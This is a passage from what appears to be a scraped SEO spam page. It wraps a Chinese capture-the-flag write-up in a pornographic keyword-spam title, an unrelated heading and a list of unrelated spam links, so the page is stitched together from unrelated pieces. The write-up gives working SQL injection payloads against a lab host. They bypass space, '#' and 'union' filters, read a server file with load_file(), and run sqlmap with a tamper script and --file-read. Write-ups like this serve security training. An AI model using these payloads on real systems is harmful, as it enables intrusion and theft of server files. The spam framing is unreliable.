中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當前位置: 首頁 > news >正文

怎樣做網站首頁圖片變換seo研究中心培訓機構

怎樣做網站首頁圖片變換,seo研究中心培訓機構,如何做像京東淘寶那樣的網站,泉州網站建設優(yōu)化url:http://192.168.154.253:81/ #打開http://XXX:81/,XXX為靶機的ip地址 審題 1、打開題目看到有一個提示,此題目需要通過SQL注入漏洞讀取/tmp/360/key文件,key在這個文件中 2、開始答題 發(fā)現這里url中有一個id的參數&#xff0…

url:http://192.168.154.253:81/? #打開http://XXX:81/,XXX為靶機的ip地址

審題

1、打開題目看到有一個提示,此題目需要通過SQL注入漏洞讀取/tmp/360/key文件,key在這個文件中

2、開始答題

發(fā)現這里url中有一個id的參數,并且給出了當前所執(zhí)行的sql語句

第一步:判斷注入點

1、?id=1'

2、?id=1'and'1'='1

第二步:判斷語句模板

1、使用 order by 判斷語句模板列數

發(fā)現語句在執(zhí)行中過濾了空格還過濾了“#”

執(zhí)行失敗:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

執(zhí)行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解釋:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用來閉合前面的語句,order/**/by/**/3%23(order by 3)用來查詢模板列數
  • /**/(用注釋的方式代替空格),%23(使用url編碼代替#

2、判斷出語句模板有4個字段

回顯正常:

?id=1')and'1'='1'order/**/by/**/4%23? #執(zhí)行 order by 4 的時候回顯正常

回顯不正常:

?id=1')and'1'='1'order/**/by/**/5%23? #執(zhí)行 order by 5 的時候回顯不正常

第三步:找回顯點

回顯不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 報錯找回顯點

回顯正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于過濾了union,所以這里使用雙寫的方式經行過濾繞過,并且判斷出回顯點有3個(語句模板中的234位置均為回顯點)

第四步:拿到flag

執(zhí)行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解釋:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #當前數據庫名
  • user() #當前數據庫用戶名
  • load_file('/tmp/360/key') #讀取服務器文件

擴展:使用sqlmap一把梭哈

1、由于前面判斷出了此題注入點存在過濾空格的情況,所以在使用sqlmap的時候需要指定腳本(用注釋/**/替換空格字符' ':--tamper "space2comment.py")運行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py腳本所以使用python執(zhí)行,用kali就直接用第二條命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?#我用的是sqlmap.py腳本所以使用python執(zhí)行,用kali就直接用第二條命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key" ?

2、獲取到flag

http://www.risenshineclean.com/news/43132.html

相關文章:

  • 做俄羅斯外貿的網站設計網址域名ip查詢
  • 潮汕網站建設antnw網頁設計需要學什么
  • 網站加速服務武漢seo網絡優(yōu)化公司
  • 做網站的學什么代碼海外推廣服務
  • 麗水微信網站建設哪家好滄州網絡推廣公司
  • 建立網站的詳細步驟營銷模式有哪些 新型
  • 香港空間建網站百度一下百度網頁版
  • html網站要怎么做簡單制作html靜態(tài)網頁
  • 眉山市住房和城鄉(xiāng)建設局網站西安推廣平臺排行榜
  • 還有哪些免費的網站可以做H5優(yōu)化推廣什么意思
  • 南京響應式網站制作搜索引擎營銷案例有哪些
  • 1高端網站建設百度sem競價托管公司
  • 做美食的網站有那一些2345中國最好的網址站
  • 云南網站做的好的公司自己怎么免費做百度推廣
  • 做網站用哪些語言seo是什么縮寫
  • 網站推廣結束語長沙網站優(yōu)化公司
  • 網站后臺密碼忘了全國人大常委會
  • 在godaddy做網站貴嗎在線識別圖片
  • 做網站是怎么賺錢的違法百度關鍵詞搜索趨勢
  • 網站設計多少錢一個優(yōu)化設計一年級下冊數學答案
  • 夜間正能量不良網站入口不用下載什么是搜索關鍵詞
  • 網站建設案例簡介怎么寫西安百度關鍵詞推廣
  • 上海青浦房地產網站建設太原做網站的工作室
  • 營銷型企業(yè)網站項目策劃表武漢seo 網絡推廣
  • app下載官方網站seo軟件簡單易排名穩(wěn)定
  • 人與狗做的電影網站西安專業(yè)seo
  • 東莞建站怎么做360手機優(yōu)化大師下載
  • 太原seo計費管理seo專業(yè)術語
  • 美國優(yōu)秀網站教你如何建立網站
  • 有人做網站花了10幾萬產品推廣方法